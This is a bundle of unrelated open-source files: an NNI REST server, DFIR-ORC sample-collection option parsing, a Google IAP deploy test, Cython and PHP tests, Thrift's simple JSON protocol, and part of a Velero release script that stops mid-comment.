// Copyright (c) Microsoft Corporation. // Licensed under the MIT license. 'use strict'; import * as bodyParser from 'body-parser'; import * as express from 'express'; import * as path from 'path'; import * as component from '../common/component'; import { RestServer } from '../common/restServer' import { getLogDir } from '../common/utils'; import { createRestHandler } from './restHandler'; /** * NNI Main rest server, provides rest API to support * # nnictl CLI tool * # NNI WebUI * */ @component.Singleton export class NNIRestServer extends RestServer { private readonly API_ROOT_URL: string = '/api/v1/nni'; private readonly LOGS_ROOT_URL: string = '/logs'; /** * constructor to provide NNIRestServer's own rest property, e.g. port */ constructor() { super(); } /** * NNIRestServer's own router registration */ protected registerRestHandler(): void { this.app.use(express.static('static')); this.app.use(bodyParser.json({limit: '50mb'})); this.app.use(this.API_ROOT_URL, createRestHandler(this)); this.app.use(this.LOGS_ROOT_URL, express.static(getLogDir())); this.app.get('*', (req: express.Request, res: express.Response) => { res.sendFile(path.resolve('static/index.html')); }); } }
{ "pile_set_name": "Github" }
// // SPDX-License-Identifier: LGPL-2.1-or-later // // Copyright © 2011-2019 ANSSI. All Rights Reserved. // // Author(s): Jean Gautier (ANSSI) // #include "stdafx.h" #include "ParameterCheck.h" #include "ConfigFileReader.h" #include "TableOutputWriter.h" #include "SystemDetails.h" #include "GetSamples.h" #include "Temporary.h" #include "ConfigFile_GetSamples.h" #include "LogFileWriter.h" using namespace Orc; using namespace Orc::Command::GetSamples; namespace { void CheckGetThisConfiguration(Orc::Command::GetSamples::Main::Configuration& config) { if (config.getthisName.empty()) { config.getthisName = L"getthis.exe"; } if (config.getthisRef.empty()) { config.getthisRef = L"self:#"; } const std::wstring_view getThisCmd(L"getthis"); if (config.getthisArgs.empty()) { config.getthisArgs = getThisCmd; } else if (!equalCaseInsensitive(config.getthisArgs, getThisCmd, getThisCmd.length())) { // Avoid having to specify 'getthis' as first argument config.getthisArgs.insert(0, getThisCmd); config.getthisArgs.insert(getThisCmd.size(), L" "); } } } // namespace ConfigItem::InitFunction Main::GetXmlConfigBuilder() { return Orc::Config::GetSamples::root; } HRESULT Main::GetSchemaFromConfig(const ConfigItem& schemaitem) { config.sampleinfoOutput.Schema = TableOutput::GetColumnsFromConfig( _L_, config.sampleinfoOutput.TableKey.empty() ? L"SampleInfo" : config.sampleinfoOutput.TableKey.c_str(), schemaitem); config.timelineOutput.Schema = TableOutput::GetColumnsFromConfig( _L_, config.timelineOutput.TableKey.empty() ? L"SampleTimeline" : config.timelineOutput.TableKey.c_str(), schemaitem); return S_OK; } HRESULT Main::GetConfigurationFromArgcArgv(int argc, const WCHAR* argv[]) { HRESULT hr = E_FAIL; for (int i = 0; i < argc; i++) { switch (argv[i][0]) { case L'/': case L'-': if (OutputOption(argv[i] + 1, L"GetThisConfig", OutputSpec::File, config.getThisConfig)) ; else if (ParameterOption(argv[i] + 1, L"GetThisArgs", config.getthisArgs)) ; else if (OutputOption( argv[i] + 1, L"Out", static_cast<OutputSpec::Kind>(OutputSpec::Archive | OutputSpec::Directory), config.samplesOutput)) ; else if (!_wcsnicmp(argv[i] + 1, L"Autoruns", wcslen(L"Autoruns"))) { LPCWSTR pEquals = wcschr(argv[i], L'='); if (!pEquals) { if (BooleanOption(argv[i] + 1, L"Autoruns", config.bRunAutoruns)) continue; } else { if (SUCCEEDED(ExpandFilePath(pEquals + 1, config.autorunsOutput.Path))) { config.bLoadAutoruns = true; config.bKeepAutorunsXML = false; } else { if (FAILED(config.autorunsOutput.Configure(_L_, OutputSpec::File, pEquals + 1))) { log::Error(_L_, E_INVALIDARG, L"Invalid autoruns file specified: %s\r\n", pEquals + 1); return E_INVALIDARG; } else { config.bRunAutoruns = true; config.bKeepAutorunsXML = true; } } } } else if (OutputOption(argv[i] + 1, L"SampleInfo", OutputSpec::TableFile, config.sampleinfoOutput)) ; else if (OutputOption(argv[i] + 1, L"TimeLine", OutputSpec::TableFile, config.timelineOutput)) ; else if (OutputOption(argv[i] + 1, L"TempDir", OutputSpec::Directory, config.tmpdirOutput)) ; else if (FileSizeOption(argv[i] + 1, L"MaxPerSampleBytes", config.limits.dwlMaxBytesPerSample)) ; else if (FileSizeOption(argv[i] + 1, L"MaxTotalBytes", config.limits.dwlMaxBytesTotal)) ; else if (ParameterOption(argv[i] + 1, L"MaxSampleCount", config.limits.dwMaxSampleCount)) ; else if (BooleanOption(argv[i] + 1, L"NoLimits", config.limits.bIgnoreLimits)) ; else if (ParameterOption(argv[i] + 1, L"Compression", config.samplesOutput.Compression)) ; else if (ParameterOption(argv[i] + 1, L"Password", config.samplesOutput.Password)) ; else if (BooleanOption(argv[i] + 1, L"NoSigCheck", config.bNoSigCheck)) ; else if (EncodingOption(argv[i] + 1, config.csvEncoding)) { config.sampleinfoOutput.OutputEncoding = config.csvEncoding; config.timelineOutput.OutputEncoding = config.csvEncoding; } else if (ProcessPriorityOption(argv[i] + 1)) ; else if (UsageOption(argv[i] + 1)) ; else if (IgnoreCommonOptions(argv[i] + 1)) ; else { PrintUsage(); return E_INVALIDARG; } break; default: break; } } return S_OK; } HRESULT Main::GetConfigurationFromConfig(const ConfigItem& configitem) { HRESULT hr = E_FAIL; ConfigFile reader(_L_); if (FAILED( hr = config.samplesOutput.Configure( _L_, static_cast<OutputSpec::Kind>(OutputSpec::Archive | OutputSpec::Directory), configitem[GETSAMPLES_OUTPUT]))) return hr; if (FAILED( hr = config.sampleinfoOutput.Configure(_L_, OutputSpec::Kind::TableFile, configitem[GETSAMPLES_SAMPLEINFO]))) return hr; if (FAILED(hr = config.timelineOutput.Configure(_L_, OutputSpec::Kind::TableFile, configitem[GETSAMPLES_TIMELINE]))) return hr; hr = ProcessOptionAutorun(configitem); if (FAILED(hr)) { return hr; } if (FAILED(hr = config.tmpdirOutput.Configure(_L_, OutputSpec::Directory, configitem[GETSAMPLES_TEMPDIR]))) return hr; if (FAILED(hr = config.getThisConfig.Configure(_L_, OutputSpec::File, configitem[GETSAMPLES_GETTHIS_CONFIG]))) return hr; if (configitem[GETSAMPLES_SAMPLES][CONFIG_MAXBYTESPERSAMPLE]) { config.limits.dwlMaxBytesPerSample = (DWORD64)configitem[GETSAMPLES_SAMPLES][CONFIG_MAXBYTESPERSAMPLE]; } if (configitem[GETSAMPLES_SAMPLES][CONFIG_MAXBYTESTOTAL]) { config.limits.dwlMaxBytesTotal = (DWORD64)configitem[GETSAMPLES_SAMPLES][CONFIG_MAXBYTESTOTAL]; } if (configitem[GETSAMPLES_SAMPLES][CONFIG_MAXSAMPLECOUNT]) { config.limits.dwMaxSampleCount = (DWORD32)configitem[GETSAMPLES_SAMPLES][CONFIG_MAXSAMPLECOUNT]; } if (configitem[GETSAMPLES_NOLIMITS]) { config.limits.bIgnoreLimits = true; } if (configitem[GETSAMPLES_NOSIGCHECK]) { config.bNoSigCheck = true; } if (configitem[GETSAMPLES_GETTHIS]) { if (configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXENAME]) { config.getthisName = configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXENAME]; } WORD wArch = 0; if (FAILED(hr = SystemDetails::GetArchitecture(wArch))) return hr; switch (wArch) { case PROCESSOR_ARCHITECTURE_INTEL: if (configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXERUN32]) { config.getthisRef = configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXERUN32]; } break; case PROCESSOR_ARCHITECTURE_AMD64: if (SystemDetails::IsWOW64()) { if (configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXERUN32]) { config.getthisRef = configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXERUN32]; } } else { if (configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXERUN64]) { config.getthisRef = configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXERUN64]; } } break; default: log::Error(_L_, hr, L"Unsupported architecture %d\r\n", wArch); return hr; } if (config.getthisRef.empty()) { if (configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXERUN]) { config.getthisRef = configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_EXERUN]; } } if (configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_ARGS]) { config.getthisArgs = configitem[GETSAMPLES_GETTHIS][GETSAMPLES_GETTHIS_ARGS]; } } if (FAILED(hr = config.locs.AddLocationsFromConfigItem(configitem[GETSAMPLES_LOCATIONS]))) { log::Error(_L_, hr, L"Error in specific locations parsing in config file\r\n"); return hr; } if (FAILED(hr = config.locs.AddKnownLocations(configitem[GETSAMPLES_KNOWNLOCATIONS]))) { log::Error(_L_, hr, L"Error in known locations parsing\r\n"); return hr; } return S_OK; } HRESULT Main::CheckConfiguration() { HRESULT hr = E_FAIL; // TODO: make a function to use also in GetThis_config.cpp if (!config.limits.bIgnoreLimits && (config.limits.dwlMaxBytesTotal == INFINITE && config.limits.dwMaxSampleCount == INFINITE)) { log::Error( _L_, E_INVALIDARG, L"No global (at samples level, MaxBytesTotal or MaxSampleCount) has been set: set limits in configuration " L"or use /nolimits\r\n"); return E_INVALIDARG; } CheckGetThisConfiguration(config); if (config.bInstallNTrack && config.bRemoveNTrack) { log::Error(_L_, E_FAIL, L"Cannot install and remove NTrack in same command\r\n"); return E_FAIL; } if (config.tmpdirOutput.Path.empty()) { WCHAR szTempDir[MAX_PATH]; if (FAILED(hr = UtilGetTempDirPath(szTempDir, MAX_PATH))) { log::Error(_L_, hr, L"Failed to determine default temp folder\r\n"); return hr; } config.tmpdirOutput.Path = szTempDir; config.tmpdirOutput.Type = OutputSpec::Directory; } // we support only NTFS for now to get samples config.locs.Consolidate(false, FSVBR::FSType::NTFS); return S_OK; } HRESULT Main::ProcessOptionAutorun(const ConfigItem& item) { if (!item[GETSAMPLES_AUTORUNS]) { // Undefined option: do not try to execute Autoruns.exe config.bRunAutoruns = false; config.bLoadAutoruns = false; config.bKeepAutorunsXML = false; return S_OK; } HRESULT hr = config.autorunsOutput.Configure(_L_, OutputSpec::Kind::File, item[GETSAMPLES_AUTORUNS]); if (FAILED(hr)) { return hr; } if (config.autorunsOutput.Type == OutputSpec::None) { // Option is defined without any path: execute Autoruns.exe config.bRunAutoruns = true; config.bLoadAutoruns = false; config.bKeepAutorunsXML = false; return S_OK; } if (SUCCEEDED(VerifyFileExists(config.autorunsOutput.Path.c_str()))) { // Option is defined with an existing existing file path: do not execute Autoruns.exe, load file as input result config.bRunAutoruns = false; config.bLoadAutoruns = true; config.bKeepAutorunsXML = false; return S_OK; } // Option is defined with an non-existing file path: execute Autoruns.exe and keep its results in the provided path config.bRunAutoruns = true; config.bLoadAutoruns = false; config.bKeepAutorunsXML = true; return S_OK; }
{ "pile_set_name": "Github" }
<?php /* * Copyright 2019 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ use Google\Auth\ApplicationDefaultCredentials; use Google\Cloud\TestUtils\AppEngineDeploymentTrait; use Google\Cloud\TestUtils\GcloudWrapper; use GuzzleHttp\Client; use GuzzleHttp\HandlerStack; use PHPUnit\Framework\TestCase; /** * Class DeployTest */ class DeployTest extends TestCase { use AppEngineDeploymentTrait; private static $iapProjectId = 'cloud-iap-for-testing'; private static $iapClientId = '1031437410300-ki5srmdg37qc6cl521dlqcmt4gbjufn5.apps.googleusercontent.com'; /** * Check project env vars needed to deploy the application. * Override so GOOGLE_PROJECT_ID is not required. */ private static function checkProjectEnvVars() { } /** * Deploy the application. * Override to set custom project ID for IAP */ public static function deployApp() { // This has to go here because the requirements are out of order self::requireEnv('GOOGLE_APPLICATION_CREDENTIALS'); // Deploy using the IAP project ID self::$gcloudWrapper = new GcloudWrapper( self::$iapProjectId, self::requireEnv('GOOGLE_VERSION_ID') ); self::baseDeployApp(); } /** * Set up the client. * Override to use ID Token auth for IAP * * @before */ public function setUpClient() { $stack = HandlerStack::create(); $stack->push(ApplicationDefaultCredentials::getIdTokenMiddleware( self::$iapClientId )); // create the HTTP client $this->client = new Client([ 'handler' => $stack, 'auth' => 'google_auth', 'base_uri' => self::getBaseUri(), ]); } public function testIndex() { $serviceAccountEmail = json_decode(file_get_contents( self::requireEnv('GOOGLE_APPLICATION_CREDENTIALS') ), true)['client_email']; $resp = $this->client->get('/'); $this->assertEquals('200', $resp->getStatusCode()); $this->assertContains( sprintf('<h1>Hello %s</h1>', $serviceAccountEmail), (string) $resp->getBody() ); } }
{ "pile_set_name": "Github" }
# mode: compile cdef void foo(): cdef int bool, int1=0, int2=0 cdef float float1=0, float2=0 cdef char *ptr1=NULL, *ptr2=NULL cdef int *ptr3 bool = int1 == int2 bool = int1 != int2 bool = float1 == float2 bool = ptr1 == ptr2 bool = int1 == float2 bool = ptr1 is ptr2 bool = ptr1 is not ptr2 foo()
{ "pile_set_name": "Github" }
2 0 0 0 0 0 2 0 5 0 0 0 0 2 5 0 0 4 3 2 0 0 2 2 0 2 0 4 0 0 2 0 0 2 0 0 2 2 0 2 2 7 2 0 0 5 2 0 2 2 5 0 1 4 2 2 0 0 5 0 2 2 4 0 0 2 2 0 3 2 0 0 4 0 0 4 0 4 0 3 0 0 2 0 2 2 0 8 0 0 0 1 2 0 2 3 0 4 0 2 1 2 0 0 2 4 0 2 0 0 2 0 0 0 3 0 2 2 0 0 2 2 0 4 0 3 4 0 0 0 0 2 4 2 2 2 0 8 2 0 0 0 2 4 0 2 4 0 4 2 0 0 1 2 1 2 0 2 2 0 0 2 0 4 3 0 0 0 0 0 9 4 2 0 0 2 0 3 0 0 4 1 0 0 0 2 4 0 0 0 0 0 4 0 2 9 2 2 4 2 2 0 0 1 5 0 0 4 0 0 4 0 0 0 4 2 2 0 2 2 2 2 2 0 2 2 0 0 0 2 0 2 2 0 0 2 0 4 2 2 0 5 0 2 1 0 2 0 2 2 0 0 2 2 4 0 4 2 2 0 2 0 0 4 2 2 4 0 2 0 2 0 0 0 2 0 0 0 0 0 2 4 0 2 0 2 2 0
{ "pile_set_name": "Github" }
--TEST-- Test chop() function : usage variations - miscellaneous arguments --FILE-- <?php /* Prototype : string chop ( string $str [, string $charlist] ) * Description: Strip whitespace (or other characters) from the end of a string * Source code: ext/standard/string.c */ /* * Testing chop() : with miscellaneous arguments */ echo "*** Testing chop() : with miscellaneous arguments ***\n"; var_dump ( chop("chop test \t\0 ") ); /* without second Argument */ var_dump ( chop("chop test " , "") ); /* no characters in second Argument */ var_dump ( chop("chop test ", NULL) ); /* with NULL as second Argument */ var_dump ( chop("chop test ", true) ); /* with boolean value as second Argument */ var_dump ( chop("chop test ", " ") ); /* with single space as second Argument */ var_dump ( chop("chop test \t\n\r\0\x0B", "\t\n\r\0\x0B") ); /* with multiple escape sequences as second Argument */ var_dump ( chop("chop testABCXYZ", "A..Z") ); /* with characters range as second Argument */ var_dump ( chop("chop test0123456789", "0..9") ); /* with numbers range as second Argument */ var_dump ( chop("chop test$#@", "#@$") ); /* with some special characters as second Argument */ echo "Done\n"; ?> --EXPECTF-- *** Testing chop() : with miscellaneous arguments *** string(9) "chop test" string(12) "chop test " string(17) "chop test " string(17) "chop test " string(9) "chop test" string(10) "chop test " string(9) "chop test" string(9) "chop test" string(9) "chop test" Done
{ "pile_set_name": "Github" }
/* * Copyright (c) Facebook, Inc. and its affiliates. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <thrift/lib/cpp/protocol/TSimpleJSONProtocol.h> using namespace apache::thrift::transport; using namespace apache::thrift::reflection; namespace apache { namespace thrift { namespace protocol { TSimpleJSONProtocol::TSimpleJSONProtocol(std::shared_ptr<TTransport> ptrans) : TVirtualProtocol<TSimpleJSONProtocol, TJSONProtocol>(ptrans), nextType_(nullptr), numSkipped_(0) {} TSimpleJSONProtocol::TSimpleJSONProtocol(TTransport* ptrans) : TVirtualProtocol<TSimpleJSONProtocol, TJSONProtocol>(ptrans), nextType_(nullptr), numSkipped_(0) {} TSimpleJSONProtocol::~TSimpleJSONProtocol() {} /** * Writing functions. */ Schema* TSimpleJSONProtocol::getSchema() { return &schema_; } uint32_t TSimpleJSONProtocol::writeFieldBegin( const char* name, const TType /*fieldType*/, const int16_t /*fieldId*/) { return writeJSONString(name); } uint32_t TSimpleJSONProtocol::writeFieldEnd() { return 0; } uint32_t TSimpleJSONProtocol::writeMapBegin( const TType /*keyType*/, const TType /*valType*/, const uint32_t /*size*/) { return writeJSONObjectStart(); } uint32_t TSimpleJSONProtocol::writeMapEnd() { return writeJSONObjectEnd(); } uint32_t TSimpleJSONProtocol::writeListBegin( const TType /*elemType*/, const uint32_t /*size*/) { return writeJSONArrayStart(); } uint32_t TSimpleJSONProtocol::writeSetBegin( const TType /*elemType*/, const uint32_t /*size*/) { return writeJSONArrayStart(); } uint32_t TSimpleJSONProtocol::writeBool(const bool value) { return writeJSONBool(value); } /** * Reading functions */ void TSimpleJSONProtocol::setNextStructType(uint64_t reflection_id) { nextType_ = getDataTypeFromTypeNum(reflection_id); } uint32_t TSimpleJSONProtocol::readStructBegin(std::string& name) { uint32_t result = TVirtualProtocol<TSimpleJSONProtocol, TJSONProtocol>::readStructBegin( name); enterType(); return result; } uint32_t TSimpleJSONProtocol::readStructEnd() { uint32_t result = TVirtualProtocol<TSimpleJSONProtocol, TJSONProtocol>::readStructEnd(); exitType(); return result; } uint32_t TSimpleJSONProtocol::readFieldBegin( std::string& /*name*/, TType& fieldType, int16_t& fieldId) { uint32_t result = 0; auto currentType = getCurrentDataType(); skipWhitespace(); result += getNumSkippedChars(); // Check if we hit the end of the list uint8_t ch = reader_.peek(); if (ch == kJSONObjectEnd) { fieldType = T_STOP; return result; } std::string tmpStr; result += readJSONString(tmpStr); if (currentType != nullptr) { auto fields = currentType->fields_ref(); if (!fields) { throw TProtocolException( TProtocolException::INVALID_DATA, "Expected a struct type, but actually not a struct"); } // find the corresponding StructField object and field id of the field for (auto ite = fields->begin(); ite != fields->end(); ++ite) { if (*ite->second.name_ref() == tmpStr) { fieldId = ite->first; fieldType = getTypeIdFromTypeNum(*ite->second.type_ref()); // set the nextType_ if the field type is a compound type // e.g. list<i64>, mySimpleStruct // // this is not really necessary, because before calling // readStructBegin(), setNextStructType() should be called // but this allows only calling setNextStructType() on the // base type auto& field = ite->second; if (isCompoundType(*field.type_ref())) { nextType_ = getDataTypeFromTypeNum(*field.type_ref()); } return result; } } } // if the field is not found or // the entire struct is being skipped fieldId = 0; skipWhitespace(); uint8_t delimiter = reader_.read(); // delimiter should be ':' fieldType = guessTypeIdFromFirstByte(); bool wasPutBack = reader_.put(delimiter); (void)wasPutBack; assert(wasPutBack); return result + getNumSkippedChars(); } uint32_t TSimpleJSONProtocol::readFieldEnd() { return 0; } uint32_t TSimpleJSONProtocol::readMapBegin( TType& keyType, TType& valType, uint32_t& size, bool& sizeUnknown) { enterType(); auto currentType = getCurrentDataType(); bool beingSkipped = (currentType == nullptr); (void)beingSkipped; // since we never guess an unknown field to have a map type // we should never arrive here assert(!beingSkipped); auto keyTypeNum = currentType->mapKeyType_ref().value_or(0); auto valTypeNum = currentType->valueType_ref().value_or(0); keyType = getTypeIdFromTypeNum(keyTypeNum); valType = getTypeIdFromTypeNum(valTypeNum); size = 0; sizeUnknown = true; if (isCompoundType(keyTypeNum)) { nextType_ = getDataTypeFromTypeNum(keyTypeNum); } else if (isCompoundType(valTypeNum)) { nextType_ = getDataTypeFromTypeNum(valTypeNum); } return readJSONObjectStart(); } bool TSimpleJSONProtocol::peekMap() { skipWhitespace(); return reader_.peek() != kJSONObjectEnd; } uint32_t TSimpleJSONProtocol::readMapEnd() { uint32_t result = getNumSkippedChars() + readJSONObjectEnd(); exitType(); return result; } uint32_t TSimpleJSONProtocol::readListBegin( TType& elemType, uint32_t& size, bool& sizeUnknown) { enterType(); auto currentType = getCurrentDataType(); bool beingSkipped = (currentType == nullptr); if (beingSkipped) { uint32_t result = readJSONArrayStart(); elemType = guessTypeIdFromFirstByte(); size = 0; sizeUnknown = true; return result + getNumSkippedChars(); } else { auto elemTypeNum = currentType->valueType_ref().value_or(0); elemType = getTypeIdFromTypeNum(elemTypeNum); size = 0; sizeUnknown = true; if (isCompoundType(elemTypeNum)) { nextType_ = getDataTypeFromTypeNum(elemTypeNum); } return readJSONArrayStart(); } } bool TSimpleJSONProtocol::peekList() { skipWhitespace(); return reader_.peek() != kJSONArrayEnd; } uint32_t TSimpleJSONProtocol::readListEnd() { uint32_t result = getNumSkippedChars(); result += TVirtualProtocol<TSimpleJSONProtocol, TJSONProtocol>::readListEnd(); exitType(); return result; } uint32_t TSimpleJSONProtocol::readSetBegin( TType& elemType, uint32_t& size, bool& sizeUnknown) { enterType(); auto currentType = getCurrentDataType(); bool beingSkipped = (currentType == nullptr); (void)beingSkipped; // since we never guess an unknown field to have a set type // we should never arrive here assert(!beingSkipped); auto elemTypeNum = currentType->valueType_ref().value_or(0); elemType = getTypeIdFromTypeNum(elemTypeNum); size = 0; sizeUnknown = true; if (isCompoundType(elemTypeNum)) { nextType_ = getDataTypeFromTypeNum(elemTypeNum); } return readJSONArrayStart(); } bool TSimpleJSONProtocol::peekSet() { skipWhitespace(); return reader_.peek() != kJSONArrayEnd; } uint32_t TSimpleJSONProtocol::readSetEnd() { uint32_t result = getNumSkippedChars(); result += TVirtualProtocol<TSimpleJSONProtocol, TJSONProtocol>::readSetEnd(); exitType(); return result; } uint32_t TSimpleJSONProtocol::readBool(bool& value) { return readJSONBool(value); } TType TSimpleJSONProtocol::getTypeIdFromTypeNum(int64_t fieldType) { Type type = getType(fieldType); switch (type) { case Type::TYPE_VOID: return T_VOID; case Type::TYPE_STRING: return T_STRING; case Type::TYPE_BOOL: return T_BOOL; case Type::TYPE_BYTE: return T_BYTE; case Type::TYPE_I16: return T_I16; case Type::TYPE_I32: return T_I32; case Type::TYPE_I64: return T_I64; case Type::TYPE_DOUBLE: return T_DOUBLE; case Type::TYPE_FLOAT: return T_FLOAT; case Type::TYPE_LIST: return T_LIST; case Type::TYPE_SET: return T_SET; case Type::TYPE_MAP: return T_MAP; case Type::TYPE_STRUCT: return T_STRUCT; case Type::TYPE_ENUM: return T_I32; case Type::TYPE_SERVICE: case Type::TYPE_PROGRAM: default: throw TProtocolException( TProtocolException::NOT_IMPLEMENTED, "Unrecognized type"); } } /** * Given a byte, peeked from the beginning of some JSON value, determine a type * of that value. Result type is used to decide how to skip that value, so * differences between compatible types don't matter and the more general type * is assumed. * STOP is returned for } and ] to indicate end of collection. */ TType TSimpleJSONProtocol::guessTypeIdFromFirstByte() { skipWhitespace(); uint8_t byte = reader_.peek(); if (byte == kJSONObjectEnd || byte == kJSONArrayEnd) { return T_STOP; } else if (byte == kJSONStringDelimiter) { return T_STRING; } else if (byte == kJSONObjectStart) { return T_STRUCT; } else if (byte == kJSONArrayStart) { return T_LIST; } else if (byte == kJSONTrue[0] || byte == kJSONFalse[0]) { return T_BOOL; } else if ( byte == '+' || byte == '-' || byte == '.' || byte == '0' || byte == '1' || byte == '2' || byte == '3' || byte == '4' || byte == '5' || byte == '6' || byte == '7' || byte == '8' || byte == '9') { return T_DOUBLE; } else { throw TProtocolException( TProtocolException::NOT_IMPLEMENTED, "Unrecognized byte: " + std::string((char*)&byte, 1)); } } DataType* TSimpleJSONProtocol::getDataTypeFromTypeNum(int64_t typeNum) { auto ite = schema_.dataTypes_ref()->find(typeNum); if (ite == schema_.dataTypes_ref()->cend()) { throw TProtocolException( TProtocolException::INVALID_DATA, "Type id not found, schema is corrupted"); } return &(ite->second); } void TSimpleJSONProtocol::enterType() { typeStack_.push(nextType_); nextType_ = nullptr; } void TSimpleJSONProtocol::exitType() { auto lastType = getCurrentDataType(); typeStack_.pop(); auto currentType = getCurrentDataType(); if (!currentType) { nextType_ = nullptr; return; } auto mapKeyType = currentType->mapKeyType_ref(); auto valueType = currentType->valueType_ref(); if (mapKeyType && isCompoundType(*mapKeyType) && (!valueType || !isCompoundType(*valueType) || lastType == getDataTypeFromTypeNum(*valueType))) { nextType_ = getDataTypeFromTypeNum(*mapKeyType); } else if (valueType && isCompoundType(*valueType)) { nextType_ = getDataTypeFromTypeNum(*valueType); } else { nextType_ = nullptr; } } // returns nullptr when the struct is to be skipped const DataType* TSimpleJSONProtocol::getCurrentDataType() { if (!typeStack_.empty()) { return typeStack_.top(); } else { return nullptr; } } void TSimpleJSONProtocol::skipWhitespace() { numSkipped_ += this->skipJSONWhitespace(); } uint32_t TSimpleJSONProtocol::getNumSkippedChars() { auto temp = numSkipped_; numSkipped_ = 0; return temp; } bool TSimpleJSONProtocol::isCompoundType(int64_t fieldType) { return !isBaseType(getType(fieldType)); } } // namespace protocol } // namespace thrift } // namespace apache
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>clang_version</key> <string>Apple LLVM version 8.1.0 (clang-802.0.42)</string> <key>files</key> <array> </array> <key>diagnostics</key> <array> </array> </dict> </plist>
{ "pile_set_name": "Github" }
#!/usr/bin/env bash # Copyright 2020 the Velero contributors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # This script will do the necessary checks and actions to create a release of Velero. It will: # - validate that all prerequisites are met # - verify the version string is what the user expects. # - create a git tag # - push the created git tag to GitHub # - run GoReleaser # The following variables are needed: # - $VELERO_VERSION: defines the tag of Velero that any https://github.com/vmware-tanzu/velero/... # links in the docs should redirect to. # - $REMOTE: defines the remote that should be used when pushing tags and branches. Defaults to "upstream" # - $publish: TRUE/FALSE value where FALSE (or not including it) will indicate a dry-run, and TRUE, or simply adding 'publish', # will tag the release with the $VELERO_VERSION and push the tag to a remote named 'upstream'. # - $GITHUB_TOKEN: Needed to run the goreleaser process to generate a GitHub release. # Use https://github.com/settings/tokens/new?scopes=repo if you don't already have a token. # Regenerate an existing token: https://github.com/settings/tokens. # You may regenerate the token for every release if you prefer. # See https://goreleaser.com/environment/ for more details. # This script is meant to be a combination of documentation and executable. # If you have questions at any point, please stop and ask! # Directory in which the script itself resides, so we can use it for calling programs that are in the same directory. DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )" # Default to using upstream as the remote remote=${REMOTE:-upstream} # Parse out the branch we're on so we can switch back to it at the end of a dry-run, where we delete the tag. Requires git v1.8.1+ upstream_branch=$(git symbolic-ref --short HEAD) function tag_and_push() { echo "Tagging $VELERO_VERSION" git tag $VELERO_VERSION || true if [[ $publish == "TRUE" ]]; then echo "Pushing $VELERO_VERSION" git push "$remote" $VELERO_VERSION fi } # Default to a dry-run mode publish=FALSE if [[ "$1" = "publish" ]]; then publish=TRUE fi # For now, have the person doing the release pass in the VELERO_VERSION variable as an environment variable. # In the future, we might be able to inspect git via `git describe --abbrev=0` to get a hint for it. if [[ -z "$VELERO_VERSION" ]]; then printf "The \$VELERO_VERSION environment variable is not set. Please set it with\n\texport VELERO_VERSION=v<version.to.release>\nthen try again." exit 1 fi # Make sure the user's provided their github token, so we can give it to goreleaser. if [[ -z "$GITHUB_TOKEN" ]]; then printf "The GITHUB_TOKEN environment variable is not set. Please set it with\n\t export GITHUB_TOKEN=<your github token>\n then try again." exit 1 fi # Ensure that we have a clean working tree before we let any changes happen, especially important for cutting release branches. if [[ -n $(git status --short) ]]; then echo "Your git working directory is dirty! Please clean up untracked files and stash any changes before proceeding." exit 3 fi # Make sure that there's no issue with the environment variable's format before trying to eval the parsed version. if ! go run $DIR/chk_version.go --verify; then exit 2 fi # Since we're past the validation of the VELERO_VERSION, parse the version's individual components. eval $(go run $DIR/chk_version.go) printf "To clarify, you've provided a version string of $VELERO_VERSION.\n" printf "Based on this, the following assumptions have been made: \n" [[ "$VELERO_PATCH" != 0 ]] && printf "*\t This is a patch release.\n" # $VELERO_PRERELEASE gets populated by the chk_version.go script that parses and verifies the given version format # -n is "string is non-empty" [[ -n $VELERO_PRERELEASE ]] && printf "*\t This is a pre-release.\n" # -z is "string is empty" [[ -z $VELERO_PRERELEASE ]] && printf "*\t This is a GA release.\n" if [[ $publish == "TRUE" ]]; then echo "If this is all correct, press enter/return to proceed to TAG THE RELEASE and UPLOAD THE TAG TO GITHUB." else echo "If this is all correct, press enter/return to proceed to TAG THE RELEASE and PROCEED WITH THE DRY-RUN." fi echo "Otherwise, press ctrl-c to CANCEL the process without making any changes." read -p "Ready to continue? " echo "Alright, let's go." echo "Pulling down all git tags and branches before doing any work." git fetch "$remote" --tags # $VELERO_PATCH gets populated by the chk_version.go scrip that parses and verifies the given version format # If we've got a patch release, we'll need to create a release branch for it. if [[ "$VELERO_PATCH" > 0 ]]; then release_branch_name=release-$VELERO_MAJOR.$VELERO_MINOR # Check if the branch exists, creating it if not. # The fetch command above should have gotten all the upstream branches, 